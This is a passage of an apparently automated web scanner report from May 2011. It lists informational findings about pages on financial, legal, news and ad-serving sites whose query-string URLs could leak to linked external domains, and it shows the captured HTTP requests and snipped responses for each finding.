document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305632367&custom_user_segments=%2C11265%2C17154%2C49027%2C59012%2C50056%2C50185%2C17163%2C50060%2C49026%2C50064%2C4625%2C45714%2C10478%2C10518%2C6551%2C48153%2C48156%2C48157%2C10656%2C14769%2C24493%2C10672%2C8%2C38582%2C48201%2C23864%2C57145%2C57148%2C30653%2C10504%2C10047%2C17857%2C41538%2C13893%2C55494%2C45639%2C45640%2C1097%2C56778%2C13899%2C30354%2C18125%2C13902%2C51919%2C48080%2C18129%2C10068%2C39944%2C53433%2C26724%2C50398%2C30304%2C24420%2C1073%2C40657%2C56808%2C58364%2C39531%2C56813%2C57454%2C10480%2C1150%2C58870%2C40809%2C59007%2C39804%2C11262%2C9855"/>');

19.26. http://privatemoneytalk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://privatemoneytalk.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://privatemoneytalk.com/?utm_source=msn&utm_medium=cpc&utm_term=private%20equity

The response contains the following links to other domains:

http://gmpg.org/xfn/11
http://infusionextreme.com/tracker/js/t8ea1977da8b0f1a343c918eec0a87bfb.js

Request

Response

19.27. http://securelab.digiware.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://securelab.digiware.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://securelab.digiware.net/?cat=8

The response contains the following links to other domains:

http://ezinearticles.com/?Panic-Attack---Causes,-Symptoms-and-Cures&id=3873312
http://famfamfam.com/
http://twitter.com/securelab
http://wordpress.org/
http://www.condorlabs.net/

Request

GET /?cat=8 HTTP/1.1
Host: securelab.digiware.net
Proxy-Connection: keep-alive
Referer: http://securelab.digiware.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://securelab.digiware.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
</a>
<a href="http://twitter.com/securelab" target="_blank" class="buttonfixed" title="Follow me" style="top:40px;">
<div class="twit1">
...[SNIP]...
<li class="recentcomments"><a href='http://ezinearticles.com/?Panic-Attack---Causes,-Symptoms-and-Cures&id=3873312' rel='external nofollow' class='url'>Panic Attack</a>
...[SNIP]...
<li><a href="http://www.condorlabs.net" title="Secured VoIP">CondorLabs</a>
...[SNIP]...
</a>. Sweet icons by <a href="http://famfamfam.com/">famfamfam</a>
...[SNIP]...
<div id="footerright">
<a href="http://wordpress.org" title="WordPress platform" ><img src="http://securelab.digiware.net/wp-content/themes/pixel/images/wpfooter-trans.png" alt="WordPress" width="34" height="34" />
...[SNIP]...

19.28. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5271.contextweb.com/B5456322.7;sz=300x250;ord=2131773229?
http://ad.doubleclick.net/adj/N5271.contextweb.com/B5456322.7;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~;ord=2131773229?
http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match
http://bh.contextweb.com/bh/drts?drts=true&ck=FC1-WC%40%255E56301_1_2Ui1T%40.contextweb.com%40989591948%40%252F%7CCDSActionTracking6%40r2lmvJHLrhjp%257CwOebwAz4UvVv%257C533594%257C3136%257C6449%257C56301%257C119820%257C96152%257C3%257C145%257C9%257Cfoxbusiness.com%257C2%257C8%257C1%257C0%257C4%257C3%257C2%257CLIFL1.FCRT1.ZETC1.AMQU2.NETM7.EXPD1.FACO1%257C1%257C1%257Cc_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk%255E%257CI%257C2TVyl%257C34NQN%40.contextweb.com%4045412748%40%252F&rnd=v0CzR1ayL7u8
http://bh.contextweb.com/bh/it?i=r2lmvJHLrhjp&p=533594&ct=96152&ad=56301&cc=119820&dm=foxbusiness.com&bp=4.00&wp=4.00&rnd=tZWZ0W5q5Qtk
http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~http://ad.doubleclick.net/jump/N5271.contextweb.com/B5456322.7;sz=300x250;ord=2131773229?
http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif?labels=3%2e4%2e5%2e300x250&media=apl&idmatch=0
http://w55c.net/ct/cms-2-frame.html?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2698
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:09 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5271.contextweb.com/B5456322.7;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~;ord=2131773229?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~http://ad.doubleclick.net/jump/N5271.contextweb.com/B5456322.7;sz=300x250;ord=2131773229?">
<IMG SRC="http://ad.doubleclick.net/ad/N5271.contextweb.com/B5456322.7;sz=300x250;ord=2131773229?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>

<img src="http://bh.contextweb.com/bh/it?i=r2lmvJHLrhjp&p=533594&ct=96152&ad=56301&cc=119820&dm=foxbusiness.com&bp=4.00&wp=4.00&rnd=tZWZ0W5q5Qtk" height="1" width="1"/>

<img src="http://bh.contextweb.com/bh/drts?drts=true&ck=FC1-WC%40%255E56301_1_2Ui1T%40.contextweb.com%40989591948%40%252F%7CCDSActionTracking6%40r2lmvJHLrhjp%257CwOebwAz4UvVv%257C533594%257C3136%257C6449%257C56301%257C119820%257C96152%257C3%257C145%257C9%257Cfoxbusiness.com%257C2%257C8%257C1%257C0%257C4%257C3%257C2%257CLIFL1.FCRT1.ZETC1.AMQU2.NETM7.EXPD1.FACO1%257C1%257C1%257Cc_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk%255E%257CI%257C2TVyl%257C34NQN%40.contextweb.com%4045412748%40%252F&rnd=v0CzR1ayL7u8" height="1" width="1"/>

</div>
...[SNIP]...
<div style="width:0;height:0">

<img src="http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif?labels=3%2e4%2e5%2e300x250&media=apl&idmatch=0" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://w55c.net/ct/cms-2-frame.html?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>

<script type="text/javascript" src="http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...

19.29. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.15.57
http://pagead2.googlesyndication.com/pagead/imp.gif?client=ca-nytimes_display_html&event=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.nytco.com/
http://www.nytco.com/career.html
http://www.nytimes.whsites.net/mediakit/

Request

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:15:57 GMT
Content-type: text/html
Set-cookie: adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:15:57 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Cache-Control: private
Content-Length: 70079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Private Equity News
...[SNIP]...
SiteSearchQ111-1694922-nyt1&ad=NEW.88x31.SiteSearch.Wizard&goto=http://ad.doubleclick.net/jump/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.15.57" TARGET="_blank">
<IMG SRC="http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.15.57"
BORDER=0 WIDTH=88 HEIGHT=31
ALT="Click Here"></A>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<noscript>
<img height="1" width="1" border="0" src="http://pagead2.googlesyndication.com/pagead/imp.gif?client=ca-nytimes_display_html&event=noscript" />
</noscript>
<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 125px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>

<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 9px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</a> <a href="http://www.nytco.com/">The New York Times Company</a>
...[SNIP]...
<li><a href="http://www.nytco.com/career.html">Work for Us</a>
...[SNIP]...
<li><a href="http://www.nytimes.whsites.net/mediakit/">Advertise</a>
...[SNIP]...

19.30. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://topics.nytimes.com
Path:	/topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.40.04
http://pagead2.googlesyndication.com/pagead/imp.gif?client=ca-nytimes_display_html&event=noscript
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.nytco.com/
http://www.nytco.com/career.html
http://www.nytimes.whsites.net/mediakit/

Request

GET /topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; _chartbeat2=0b2fi2bgk284tw0q; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200243892:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; nyt-m=2C6EA0974B7E4DBF1FAB9FF2C27C8FEF&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.17.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:2|s*18a4b=0:2|s*1780a=0:3|s*2554b=0:1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:40:04 GMT
Content-type: text/html
Set-cookie: adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:40:04 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:2|s*18a4b=0:2|s*1780a=0:3|s*2554b=0:2; path=/; domain=.nytimes.com
Cache-Control: private
Content-Length: 70166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Private Equity News
...[SNIP]...
SiteSearchQ111-1694922-nyt1&ad=NEW.88x31.SiteSearch.Wizard&goto=http://ad.doubleclick.net/jump/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.40.04" TARGET="_blank">
<IMG SRC="http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5;sz=88x31;pc=nyt160585A252821;ord=2011.05.12.11.40.04"
BORDER=0 WIDTH=88 HEIGHT=31
ALT="Click Here"></A>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<noscript>
<img height="1" width="1" border="0" src="http://pagead2.googlesyndication.com/pagead/imp.gif?client=ca-nytimes_display_html&event=noscript" />
</noscript>
<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 125px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>

<div style="font-family: Arial; font-size: 10px; color:#004276; float: right; margin-right: 9px;"><a href="http://www.nytimes.whsites.net/mediakit/">Advertise on NYTimes.com</a>
...[SNIP]...
</a> <a href="http://www.nytco.com/">The New York Times Company</a>
...[SNIP]...
<li><a href="http://www.nytco.com/career.html">Work for Us</a>
...[SNIP]...
<li><a href="http://www.nytimes.whsites.net/mediakit/">Advertise</a>
...[SNIP]...

19.31. https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://webmail.tuckerellis.com
Path:	/exchweb/bin/auth/owalogon.asp

Issue detail

The page was loaded from a URL containing a query string:

https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp?url=https://webmail.tuckerellis.com/exchange&reason=0

The response contains the following link to another domain:

https://seal.verisign.com/getseal?host_name=webmail.tuckerellis.com&size=M&use_flash=YES&use_transparent=YES&lang=en

Request

GET /exchweb/bin/auth/owalogon.asp?url=https://webmail.tuckerellis.com/exchange&reason=0 HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://webmail.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 8890
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:33:47 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML >
...[SNIP]...
<CENTER>
<script src=https://seal.verisign.com/getseal?host_name=webmail.tuckerellis.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

19.32. https://ww3.janus.com/advisor/about-janus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ww3.janus.com
Path:	/advisor/about-janus

Issue detail

The page was loaded from a URL containing a query string:

https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1

The response contains the following links to other domains:

https://www.janusintech.com/Janus/Insti/jiam?command=feedback&source=IPSS
https://www.janusinternational.com/

Request

Response

HTTP/1.1 200 OK
Server:
Cache-Control: no-store
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
X-Powered-By: JSP/2.1
Set-Cookie: JSESSIONID=3eb42bec6b9f100ffd3113f47057; Path=/advisor
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 11:15:36 GMT
Set-Cookie: vj-ww3-advisor=3557560492.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 26435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<h
...[SNIP]...
<li><a
href="https://www.janusinternational.com/" onclick="trackFooter('https://www.janusinternational.com/', 'Offsite:Footer:Non-US Investment Professional Link-out');">Non-US Investment Professional</a>
...[SNIP]...
<li><a href="https://www.janusintech.com/Janus/Insti/jiam?command=feedback&source=IPSS" onclick="trackFooter('https://www.janusintech.com/Janus/Insti/jiam?command=feedback&source=IPSS', 'Footer:Feeback Link-out');">Feedback</a>
...[SNIP]...

19.33. http://www.apolloglobal.us/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apolloglobal.us
Path:	/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.apolloglobal.us/index.php?option=com_content&view=article&id=20&Itemid=34

The response contains the following links to other domains:

http://del.icio.us/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://joomladigger.com/
http://myweb2.search.yahoo.com/
http://reddit.com/
http://www.apollogrp.edu/
http://www.google.com/bookmarks/
http://www.stumbleupon.com/
https://favorites.live.com/
https://www.facebook.com/

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 09:33:10 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4
X-Powered-By: PHP/5.2.3-1ubuntu6.4
Set-Cookie: b01a8bbc2b6e57a153d5c05069526f2b=a3b2a52a7ef8a8f9e10abb2501b30b93; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 09:33:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<noscript>
       <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="440" height="110">
   <param name="movie" value="/templates/global/images/logo_ap.swf" />
...[SNIP]...
<td colspan="2">
<object height="200" width="950" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,124,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
<param name="src" value="/images/stories/flash/video-new.swf" />
...[SNIP]...
<div>
                                           <object height="220" width="240" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,124,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000">
<param name="src" value="/images/stories/flash/mini_map_logo-new.swf" />
...[SNIP]...
<br/><a rel="nofollow" onclick="window.open('http://reddit.com/submit?url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="http://reddit.com" title="Reddit!" target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/reddit.png" alt="Reddit!" title="Reddit!" /></a> <a rel="nofollow" href="http://del.icio.us/" title="Del.icio.us!" target="_blank" onclick="window.open('http://del.icio.us/post?v=4&noui&jump=close&url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/delicious.png" alt="Del.icio.us!" title="Del.icio.us!" /></a> <a rel="nofollow" onclick="window.open('http://www.google.com/bookmarks/mark?op=edit&bkmk=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="http://www.google.com/bookmarks/" title="Google!" target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/google.png" alt="Google!" title="Google!" /></a> <a rel="nofollow" onclick="window.open('https://favorites.live.com/quickadd.aspx?url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="https://favorites.live.com/" title="Live!" target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/live.png" alt="Live!" title="Live!" /></a> <a rel="nofollow" onclick="window.open('http://www.facebook.com/sharer.php?u=' + encodeURIComponent('http://www.apolloglobal.us') + '&t=' + encodeURIComponent('Global Management') + ''); return false;" href="https://www.facebook.com/" title="Facebook!" target="_blank"><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/facebook.png" alt="Facebook!" title="Facebook!" /></a> <a rel="nofollow" onclick="window.open('http://www.stumbleupon.com/submit?url=' + encodeURIComponent('http://www.apolloglobal.us') + '&title=' + encodeURIComponent('Global Management') + ''); return false;" href="http://www.stumbleupon.com/" title="StumbleUpon!" target="_blank"><img src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/stumbleupon.png" alt="StumbleUpon!" title="StumbleUpon!" /></a> <a rel="nofollow" onclick="window.open('http://myweb2.search.yahoo.com/myresults/bookmarklet?u=' + encodeURIComponent('http://www.apolloglobal.us') + '&t=' + encodeURIComponent('Global Management') + ''); return false;" href="http://myweb2.search.yahoo.com/" title="Yahoo!" target="_blank"><img src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/yahoo.png" alt="Yahoo!" title="Yahoo!" /></a> <a href="http://joomladigger.com/" title="Add any social bookmarking button to your blog."><img height="18px" width="18px" src="http://www.apolloglobal.us/plugins/content/usbp_images/glossy/joomladigger.png" alt="Free social bookmarking plugins and extensions for Joomla! websites!" title="Bo
...[SNIP]...
<td><a href="http://www.apollogrp.edu" target="_blank"><img src="/templates/global/images/logo-apollo-group.gif" border="0" align="right" />
...[SNIP]...

19.34. http://www.butlerrubin.com/web/br.nsf/index previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/index

Issue detail

The page was loaded from a URL containing a query string:

http://www.butlerrubin.com/web/br.nsf/index?openform

The response contains the following link to another domain:

http://www.google-analytics.com/urchin.js

Request

GET /web/br.nsf/index?openform HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:25 GMT
Last-Modified: Thu, 12 May 2011 12:21:23 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12175
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nation
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

